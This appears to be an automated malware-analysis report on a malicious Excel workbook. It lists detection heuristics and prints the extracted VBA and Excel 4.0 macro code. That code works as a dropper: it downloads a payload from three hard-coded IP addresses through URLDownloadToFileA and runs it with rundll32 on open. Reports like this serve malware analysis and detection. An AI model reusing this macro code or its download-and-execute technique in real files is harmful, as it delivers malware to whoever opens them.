MALICIOUS
190
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample contains critical Excel 4.0 macros that utilize dangerous functions like CALL and REGISTER to download and execute payloads. The Auto_Open VBA macro also attempts to run a sheet named 'Klof'. The presence of multiple suspicious URLs suggests a downloader or droppper functionality. The combination of VBA and XLM macros points to a sophisticated attack leveraging older Excel features.
Heuristics 6
-
Excel 4.0 macro sheet (2 sheet(s)) critical 1 related finding OOXML_XLM_MACROSHEETSpreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
-
Dangerous XLM formula APIs: HALT, REGISTER, GOTO, EXEC critical OOXML_XLM_DANGEROUS_FNExcel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
-
VBA project inside OOXML medium 1 related finding OOXML_VBADocument contains a VBA project — VBA macros present
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
Hidden worksheet (hidden) low OOXML_HIDDEN_SHEETExcel workbook contains 2 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://45.138.157.63/ In document text (OOXML body / shared strings)
- http://185.14.31.59/44313,6048108796.datIn document text (OOXML body / shared strings)
- http://45.138.157.63/44313,6048108796.datIn document text (OOXML body / shared strings)
- http://167.114.48.59/44313,6048108796.datIn document text (OOXML body / shared strings)
- http://185.14.31.59/In document text (OOXML body / shared strings)
- http://167.114.48.59/In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/spreadsheetml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/excel/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2009/9/acIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2014/revisionIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2015/revision2In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2016/revision3In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2016/revision6In document text (OOXML body / shared strings)
Extracted artifacts 4
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 16398 bytes |
SHA-256: 93c5b5069f910db13d08004fd9c90d4a1d5d55d767ea4a26da2a888ea23d58c3 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "dfgbfdg"
Private Sub Auto_Open()
Application.Run Sheets("Klof").Range("AJ6")
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMaximized
Application.WindowState = xlMax
... (truncated)
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 28160 bytes |
SHA-256: 8cb40a0b5e5940f328e54000440cd3d6d132d980e84d59e085c3b458e3acf2f6 |
|||
xlm_sheet_00.xml |
xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet1.xml | 4502 bytes |
SHA-256: e8c6d8792e3e310b1df23866dbd173d4bec5628a83ded013e399050fdb4a128e |
|||
Preview scriptFirst 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{0131C73D-C3C0-4C7F-B61C-5AFDDB7835F8}"><dimension ref="AD92:AJ111"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="14.28515625" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="28" width="14.28515625" style="3"/><col min="29" max="29" width="14.28515625" style="3" customWidth="1"/><col min="30" max="30" width="14.28515625" style="1" hidden="1" customWidth="1"/><col min="31" max="31" width="21" style="1" hidden="1" customWidth="1"/><col min="32" max="35" width="14.28515625" style="1" hidden="1" customWidth="1"/><col min="36" max="36" width="23.5703125" style="1" hidden="1" customWidth="1"/><col min="37" max="16384" width="14.28515625" style="3"/></cols><sheetData><row r="92" spans="33:36" x14ac:dyDescent="0.25"><c r="AI92" s="1"><v>1</v></c></row><row r="93" spans="33:36" x14ac:dyDescent="0.25"><c r="AI93" s="1"><v>9</v></c></row><row r="94" spans="33:36" x14ac:dyDescent="0.25"><c r="AJ94" s="1" t="b"><f>ON.TIME(NOW()+"00:00:02","JEIUYUITRYF")</f><v>0</v></c></row><row r="95" spans="33:36" x14ac:dyDescent="0.25"><c r="AG95" s="1" t="str"><f>CONCATENATE(AG101,AH95,AG99,AG100)</f><v>http://185.14.31.59/44313,6048108796.dat</v></c><c r="AH95" s="1"><f>NOW()</f><v>44313.604810879631</v></c></row><row r="96" spans="33:36" x14ac:dyDescent="0.25"><c r="AG96" s="1" t="str"><f>CONCATENATE(AG102,AH95,AG99,AG100)</f><v>http://45.138.157.63/44313,6048108796.dat</v></c></row><row r="97" spans="31:36" x14ac:dyDescent="0.25"><c r="AG97" s="1" t="str"><f>CONCATENATE(AG103,AH95,AG99,AG100)</f><v>http://167.114.48.59/44313,6048108796.dat</v></c><c r="AJ97" s="1" t="b"><f>HALT()</f><v>0</v></c></row><row r="98" spans="31:36" x14ac:dyDescent="0.25"><c r="AH98" s="1"><f>CONCATENATE(AG106,AG107)</f><v>0</v></c></row><row r="99" spans="31:36" x14ac:dyDescent="0.25"><c r="AG99" s="1" t="s"><v>0</v></c><c r="AI99" s="1" t="str"><f>"uRlMon"</f><v>uRlMon</v></c></row><row r="100" spans="31:36" x14ac:dyDescent="0.25"><c r="AG100" s="1" t="s"><v>1</v></c></row><row r="101" spans="31:36" x14ac:dyDescent="0.25"><c r="AG101" s="1" t="str"><f>"http://185.14.31.59/"</f><v>http://185.14.31.59/</v></c><c r="AI101" s="1" t="str"><f>"JJCCBB"</f><v>JJCCBB</v></c></row><row r="102" spans="31:36" x14ac:dyDescent="0.25"><c r="AG102" s="1" t="s"><v>4</v></c><c r="AI102" s="1" t="s"><v>2</v></c></row><row r="103" spans="31:36" x14ac:dyDescent="0.25"><c r="AG103" s="1" t="str"><f>"http://167.114.48.59/"</f><v>http://167.114.48.59/</v></c></row><row r="104" spans="31:36" x14ac:dyDescent="0.25"><c r="AE104" s="1" t="b"><f>REGISTER(AI99,AH98,AI101,AI102,,1,9)</f><v>0</v></c><c r="AH104" s="1" t="e"><f>GOTO(AE103)</f><v>#N/A</v></c></row><row r="105" spans="31:36" x14ac:dyDescent="0.25"><c r="AE105" s="1" t="e"><f>Belandes(0,AG95,AI105,0,0)</f><v>#NAME?</v></c><c r="AI105" s="1" t="s"><v>3</v></c></row><row r="106" spans="31:36" x14ac:dyDescent="0.25"><c r="AE106" s="1" t="e"><f>IF(AE105<0, Belandes(0,AG96,AI105,0,0))</f><v>#NAME?</v></c><c r="AG106" s="1" t="str"><f>"URLDow"</f><v>URLDow</v></c></row><row r="107" spans="31:36" x14ac:dyDescent="0.25"><c r="AE107" s="1" t="e"><f>IF(AE106<0, Belandes(0,AG97,AI105,0,0))</f><v>#NAME?</v></c><c r="AG107" s="1" t="str"><f>"nloadToFileA"</f><v>nloadToFileA</v></c></row><row r="109"
... (truncated)
|
|||
xlm_sheet_01.xml |
xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet2.xml | 2004 bytes |
SHA-256: efa863078546591f10559e7ec4775260a2b46f2ed03bb71ea70b51048ee05558 |
|||
Preview scriptFirst 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{0735C71A-62B4-499F-9DD8-467063A6E5C3}"><dimension ref="H7:I20"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="6" width="9.140625" style="1"/><col min="7" max="7" width="9.140625" style="1" customWidth="1"/><col min="8" max="8" width="9.85546875" style="1" customWidth="1"/><col min="9" max="16384" width="9.140625" style="1"/></cols><sheetData><row r="7" spans="8:9" x14ac:dyDescent="0.25"><c r="I7" s="1" t="str"><f>"r"</f><v>r</v></c></row><row r="9" spans="8:9" x14ac:dyDescent="0.25"><c r="I9" s="1" t="str"><f>"undll32 ..\Nuydar.veryrf,DllReg"</f><v>undll32 ..\Nuydar.veryrf,DllReg</v></c></row><row r="10" spans="8:9" x14ac:dyDescent="0.25"><c r="I10" s="1" t="str"><f>"isterServer"</f><v>isterServer</v></c></row><row r="16" spans="8:9" x14ac:dyDescent="0.25"><c r="H16" s="1" t="b"><f>EXEC(I7&I9&I10)</f><v>0</v></c></row><row r="20" spans="8:8" x14ac:dyDescent="0.25"><c r="H20" s="1" t="b"><f>HALT()</f><v>0</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.